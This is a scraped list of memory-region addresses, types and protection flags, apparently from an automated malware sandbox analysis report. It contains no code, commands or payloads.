page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
8060000
|
trusted library allocation
|
page read and write
|
||
|
1B70FF6B000
|
heap
|
page read and write
|
||
|
347F000
|
unkown
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
35D6000
|
unkown
|
page read and write
|
||
|
7FFD34941000
|
trusted library allocation
|
page read and write
|
||
|
2431D75B000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1F6D6DF0000
|
heap
|
page read and write
|
||
|
431F000
|
heap
|
page read and write
|
||
|
7BE4000
|
heap
|
page read and write
|
||
|
B10000
|
unkown
|
page readonly
|
||
|
8385000
|
heap
|
page read and write
|
||
|
1B71005C000
|
heap
|
page read and write
|
||
|
2431EDCB000
|
trusted library allocation
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
419CFF000
|
stack
|
page read and write
|
||
|
2C7E000
|
stack
|
page read and write
|
||
|
1F6D70E5000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
7FFD34A90000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2D82000
|
unkown
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
20ADD3A0000
|
heap
|
page read and write
|
||
|
2D7B000
|
heap
|
page read and write
|
||
|
7BD4000
|
heap
|
page read and write
|
||
|
C4117FB000
|
stack
|
page read and write
|
||
|
24335323000
|
heap
|
page read and write
|
||
|
2431CD70000
|
heap
|
page read and write
|
||
|
1B710036000
|
heap
|
page read and write
|
||
|
4D20000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2FEE2FF000
|
stack
|
page read and write
|
||
|
8660000
|
direct allocation
|
page read and write
|
||
|
1F78D000
|
stack
|
page read and write
|
||
|
BBE000
|
stack
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
243352B0000
|
heap
|
page read and write
|
||
|
2431B450000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
4EC0000
|
heap
|
page read and write
|
||
|
2431D30C000
|
trusted library allocation
|
page read and write
|
||
|
2DF4000
|
heap
|
page read and write
|
||
|
25A4FFC000
|
stack
|
page read and write
|
||
|
8130000
|
heap
|
page read and write
|
||
|
3280000
|
heap
|
page read and write
|
||
|
6A3E000
|
stack
|
page read and write
|
||
|
8620000
|
direct allocation
|
page read and write
|
||
|
435C000
|
heap
|
page read and write
|
||
|
2C84000
|
heap
|
page read and write
|
||
|
1F6D6D60000
|
heap
|
page read and write
|
||
|
29ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
3390000
|
trusted library allocation
|
page read and write
|
||
|
2432D066000
|
trusted library allocation
|
page read and write
|
||
|
74A0000
|
trusted library allocation
|
page read and write
|
||
|
1220000
|
heap
|
page read and write
|
||
|
7FFD34972000
|
trusted library allocation
|
page read and write
|
||
|
BF0000
|
unkown
|
page read and write
|
||
|
19E000
|
unkown
|
page readonly
|
||
|
310E000
|
stack
|
page read and write
|
||
|
6BDD000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
3429000
|
heap
|
page read and write
|
||
|
1F2B0000
|
direct allocation
|
page read and write
|
||
|
27103FC0000
|
heap
|
page read and write
|
||
|
38AC000
|
unclassified section
|
page read and write
|
||
|
2431D5C5000
|
trusted library allocation
|
page read and write
|
||
|
3120000
|
heap
|
page read and write
|
||
|
7C48000
|
heap
|
page read and write
|
||
|
838B000
|
heap
|
page read and write
|
||
|
1B7100B4000
|
heap
|
page read and write
|
||
|
1B70E21E000
|
heap
|
page read and write
|
||
|
1B7100B8000
|
heap
|
page read and write
|
||
|
1FB35000
|
heap
|
page read and write
|
||
|
30C0000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
8050000
|
trusted library allocation
|
page execute and read and write
|
||
|
46E19FE000
|
stack
|
page read and write
|
||
|
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
271058E0000
|
trusted library allocation
|
page read and write
|
||
|
9135000
|
trusted library allocation
|
page read and write
|
||
|
3A97000
|
remote allocation
|
page execute and read and write
|
||
|
2DD1000
|
heap
|
page read and write
|
||
|
790000
|
heap
|
page read and write
|
||
|
31E0000
|
heap
|
page read and write
|
||
|
296E000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2433528D000
|
heap
|
page read and write
|
||
|
1B70E357000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
7510000
|
trusted library allocation
|
page read and write
|
||
|
3F32000
|
system
|
page read and write
|
||
|
1F70E000
|
stack
|
page read and write
|
||
|
707E000
|
stack
|
page read and write
|
||
|
2431D735000
|
trusted library allocation
|
page read and write
|
||
|
7BCF000
|
heap
|
page read and write
|
||
|
1B710031000
|
heap
|
page read and write
|
||
|
84CB000
|
stack
|
page read and write
|
||
|
8380000
|
heap
|
page read and write
|
||
|
46C6000
|
system
|
page read and write
|
||
|
7F80000
|
trusted library allocation
|
page read and write
|
||
|
435E000
|
heap
|
page read and write
|
||
|
1F93F000
|
stack
|
page read and write
|
||
|
31B8000
|
heap
|
page read and write
|
||
|
2CD0000
|
heap
|
page read and write
|
||
|
1B70E010000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B71002D000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2D44000
|
heap
|
page read and write
|
||
|
1B71039F000
|
heap
|
page read and write
|
||
|
1B70FF50000
|
heap
|
page read and write
|
||
|
86D0000
|
direct allocation
|
page read and write
|
||
|
1F8FE000
|
stack
|
page read and write
|
||
|
530000
|
unkown
|
page readonly
|
||
|
7138000
|
heap
|
page read and write
|
||
|
322F000
|
heap
|
page read and write
|
||
|
46E26CA000
|
stack
|
page read and write
|
||
|
27105D01000
|
trusted library allocation
|
page read and write
|
||
|
1B70E26F000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
271058E0000
|
trusted library allocation
|
page read and write
|
||
|
2D44000
|
heap
|
page read and write
|
||
|
3201000
|
heap
|
page read and write
|
||
|
837D000
|
heap
|
page read and write
|
||
|
1B70E242000
|
heap
|
page read and write
|
||
|
3160000
|
heap
|
page read and write
|
||
|
1B710041000
|
heap
|
page read and write
|
||
|
2431D2C3000
|
trusted library allocation
|
page read and write
|
||
|
46E177E000
|
stack
|
page read and write
|
||
|
AF0000
|
unkown
|
page readonly
|
||
|
2C1A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2431B470000
|
heap
|
page execute and read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2D40000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
4670000
|
heap
|
page execute and read and write
|
||
|
803F000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
42D0000
|
direct allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B7100B8000
|
heap
|
page read and write
|
||
|
11F0000
|
heap
|
page read and write
|
||
|
2E9C000
|
unkown
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2431D713000
|
trusted library allocation
|
page read and write
|
||
|
5ACF000
|
stack
|
page read and write
|
||
|
8100000
|
trusted library allocation
|
page execute and read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2431B290000
|
heap
|
page read and write
|
||
|
1A7000
|
unkown
|
page readonly
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
7FFD34B10000
|
trusted library allocation
|
page read and write
|
||
|
A20000
|
unkown
|
page read and write
|
||
|
1B70E350000
|
heap
|
page read and write
|
||
|
9137000
|
trusted library allocation
|
page read and write
|
||
|
1B710393000
|
heap
|
page read and write
|
||
|
1B70FFD9000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2D44000
|
heap
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
1B70E225000
|
heap
|
page read and write
|
||
|
1B71004E000
|
heap
|
page read and write
|
||
|
1B71003C000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B70E29C000
|
heap
|
page read and write
|
||
|
1B710018000
|
heap
|
page read and write
|
||
|
7F90000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
5E0000
|
unkown
|
page readonly
|
||
|
BE0000
|
heap
|
page read and write
|
||
|
46E14FE000
|
stack
|
page read and write
|
||
|
1A7000
|
unkown
|
page readonly
|
||
|
20AC0000
|
unclassified section
|
page execute and read and write
|
||
|
2FEE6FB000
|
stack
|
page read and write
|
||
|
1B710011000
|
heap
|
page read and write
|
||
|
2690000
|
unkown
|
page readonly
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
844C000
|
stack
|
page read and write
|
||
|
2D82000
|
unkown
|
page read and write
|
||
|
2431B1B0000
|
heap
|
page read and write
|
||
|
1B71004E000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
A70000
|
heap
|
page read and write
|
||
|
2431B430000
|
trusted library allocation
|
page read and write
|
||
|
30D0000
|
heap
|
page read and write
|
||
|
1228000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
24335549000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B70FF59000
|
heap
|
page read and write
|
||
|
8383000
|
heap
|
page read and write
|
||
|
1B70E1FC000
|
heap
|
page read and write
|
||
|
1B70E276000
|
heap
|
page read and write
|
||
|
858E000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
24335460000
|
heap
|
page execute and read and write
|
||
|
CCE000
|
stack
|
page read and write
|
||
|
1B710020000
|
heap
|
page read and write
|
||
|
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B70E26D000
|
heap
|
page read and write
|
||
|
2431B340000
|
heap
|
page read and write
|
||
|
528E000
|
stack
|
page read and write
|
||
|
2431B2F0000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
7320000
|
trusted library allocation
|
page read and write
|
||
|
C412FFF000
|
stack
|
page read and write
|
||
|
2431B4A5000
|
heap
|
page read and write
|
||
|
1B70E25C000
|
heap
|
page read and write
|
||
|
4355000
|
heap
|
page read and write
|
||
|
C0B000
|
stack
|
page read and write
|
||
|
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
|
3852000
|
unclassified section
|
page read and write
|
||
|
4359000
|
heap
|
page read and write
|
||
|
24C0000
|
heap
|
page read and write
|
||
|
27105DA9000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B710049000
|
heap
|
page read and write
|
||
|
552C000
|
stack
|
page read and write
|
||
|
C411FFE000
|
stack
|
page read and write
|
||
|
7C86000
|
heap
|
page read and write
|
||
|
1B70E21B000
|
heap
|
page read and write
|
||
|
20ADD6C5000
|
heap
|
page read and write
|
||
|
1B71012A000
|
heap
|
page read and write
|
||
|
1B70E35A000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
29C0000
|
trusted library section
|
page read and write
|
||
|
7BF8000
|
heap
|
page read and write
|
||
|
C80000
|
heap
|
page read and write
|
||
|
1B70FF51000
|
heap
|
page read and write
|
||
|
1B70E265000
|
heap
|
page read and write
|
||
|
CD0000
|
unkown
|
page readonly
|
||
|
7C42000
|
heap
|
page read and write
|
||
|
7BDD000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2433525C000
|
heap
|
page read and write
|
||
|
5E0000
|
unkown
|
page readonly
|
||
|
42E0000
|
direct allocation
|
page read and write
|
||
|
1B71001F000
|
heap
|
page read and write
|
||
|
2C00000
|
trusted library allocation
|
page read and write
|
||
|
1FA12000
|
heap
|
page read and write
|
||
|
243354D6000
|
heap
|
page read and write
|
||
|
85F0000
|
trusted library allocation
|
page read and write
|
||
|
4E9E000
|
stack
|
page read and write
|
||
|
112C000
|
system
|
page execute and read and write
|
||
|
7FFD34A50000
|
trusted library allocation
|
page read and write
|
||
|
8650000
|
direct allocation
|
page read and write
|
||
|
1B710039000
|
heap
|
page read and write
|
||
|
4DAD000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
27105DCE000
|
trusted library allocation
|
page read and write
|
||
|
7109000
|
heap
|
page read and write
|
||
|
7350000
|
trusted library allocation
|
page read and write
|
||
|
31E8000
|
heap
|
page read and write
|
||
|
59A000
|
stack
|
page read and write
|
||
|
3390000
|
trusted library allocation
|
page read and write
|
||
|
CB0000
|
heap
|
page read and write
|
||
|
11B0000
|
unkown
|
page read and write
|
||
|
AF0000
|
unkown
|
page readonly
|
||
|
7BD2000
|
heap
|
page read and write
|
||
|
700000
|
heap
|
page read and write
|
||
|
5D0000
|
unkown
|
page readonly
|
||
|
A70000
|
heap
|
page read and write
|
||
|
2584000
|
heap
|
page read and write
|
||
|
CAB000
|
stack
|
page read and write
|
||
|
2D44000
|
heap
|
page read and write
|
||
|
745E000
|
stack
|
page read and write
|
||
|
1B710391000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2C90000
|
unkown
|
page readonly
|
||
|
837A000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
7FFD34B00000
|
trusted library allocation
|
page read and write
|
||
|
1B70E230000
|
heap
|
page read and write
|
||
|
46E1B7B000
|
stack
|
page read and write
|
||
|
1A5000
|
unkown
|
page read and write
|
||
|
19E000
|
unkown
|
page readonly
|
||
|
BD0000
|
unkown
|
page readonly
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
31B0000
|
heap
|
page read and write
|
||
|
1040000
|
unkown
|
page readonly
|
||
|
2DFA000
|
heap
|
page read and write
|
||
|
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
|
27105C21000
|
trusted library allocation
|
page read and write
|
||
|
86B0000
|
direct allocation
|
page read and write
|
||
|
6FFE000
|
stack
|
page read and write
|
||
|
74B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1020000
|
unkown
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
435F000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
7540000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
31FA000
|
heap
|
page read and write
|
||
|
7C52000
|
heap
|
page read and write
|
||
|
1B710091000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
6AFE000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1020000
|
unkown
|
page read and write
|
||
|
1B70E35E000
|
heap
|
page read and write
|
||
|
2432D085000
|
trusted library allocation
|
page read and write
|
||
|
24335247000
|
heap
|
page execute and read and write
|
||
|
1FCEE000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2580000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
7129000
|
heap
|
page read and write
|
||
|
243352FF000
|
heap
|
page read and write
|
||
|
854C000
|
stack
|
page read and write
|
||
|
1B7100B8000
|
heap
|
page read and write
|
||
|
1F2A0000
|
direct allocation
|
page read and write
|
||
|
2DAC000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B70FF51000
|
heap
|
page read and write
|
||
|
7C75000
|
heap
|
page read and write
|
||
|
5B0E000
|
stack
|
page read and write
|
||
|
29E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
6CDE000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
20ADD458000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2FEE1FF000
|
stack
|
page read and write
|
||
|
1B70E28E000
|
heap
|
page read and write
|
||
|
2DA0000
|
heap
|
page read and write
|
||
|
B90000
|
direct allocation
|
page read and write
|
||
|
828E000
|
stack
|
page read and write
|
||
|
316F000
|
stack
|
page read and write
|
||
|
27105C13000
|
trusted library allocation
|
page read and write
|
||
|
4347000
|
heap
|
page read and write
|
||
|
A31000
|
unkown
|
page readonly
|
||
|
A40000
|
unkown
|
page read and write
|
||
|
BD0000
|
unkown
|
page readonly
|
||
|
46E1093000
|
stack
|
page read and write
|
||
|
1B7100B4000
|
heap
|
page read and write
|
||
|
1070000
|
system
|
page execute and read and write
|
||
|
1B71012A000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B70E268000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1F6D6D50000
|
heap
|
page read and write
|
||
|
1F2C0000
|
direct allocation
|
page read and write
|
||
|
7FFD34793000
|
trusted library allocation
|
page execute and read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1A5000
|
unkown
|
page read and write
|
||
|
2D40000
|
heap
|
page read and write
|
||
|
243357E0000
|
heap
|
page read and write
|
||
|
3569000
|
direct allocation
|
page execute and read and write
|
||
|
46E157D000
|
stack
|
page read and write
|
||
|
1B70E24C000
|
heap
|
page read and write
|
||
|
7FFD34AA0000
|
trusted library allocation
|
page read and write
|
||
|
1B7100B8000
|
heap
|
page read and write
|
||
|
70F5000
|
heap
|
page read and write
|
||
|
1061000
|
unkown
|
page readonly
|
||
|
71C3000
|
heap
|
page read and write
|
||
|
80A5000
|
trusted library allocation
|
page read and write
|
||
|
2C90000
|
unkown
|
page readonly
|
||
|
190000
|
unkown
|
page readonly
|
||
|
2D20000
|
trusted library allocation
|
page read and write
|
||
|
271040BA000
|
heap
|
page read and write
|
||
|
6D7E000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2D44000
|
heap
|
page read and write
|
||
|
191000
|
unkown
|
page execute read
|
||
|
7330000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
7F390000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
1B710015000
|
heap
|
page read and write
|
||
|
2DF0000
|
direct allocation
|
page read and write
|
||
|
7C04000
|
heap
|
page read and write
|
||
|
1FE99000
|
direct allocation
|
page execute and read and write
|
||
|
6C9F000
|
stack
|
page read and write
|
||
|
7FFD3494A000
|
trusted library allocation
|
page read and write
|
||
|
7550000
|
trusted library allocation
|
page read and write
|
||
|
71F0000
|
trusted library allocation
|
page read and write
|
||
|
530F000
|
stack
|
page read and write
|
||
|
82CF000
|
stack
|
page read and write
|
||
|
32F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
|
1B70E231000
|
heap
|
page read and write
|
||
|
1B70E22C000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
C45000
|
heap
|
page read and write
|
||
|
1F6D6DFB000
|
heap
|
page read and write
|
||
|
2584000
|
heap
|
page read and write
|
||
|
24334D8D000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
431D000
|
heap
|
page read and write
|
||
|
1A7000
|
unkown
|
page readonly
|
||
|
28E0000
|
heap
|
page read and write
|
||
|
1B71007C000
|
heap
|
page read and write
|
||
|
2431B2F2000
|
heap
|
page read and write
|
||
|
688000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
80B0000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
There are 1196 hidden memdumps, click here to show them.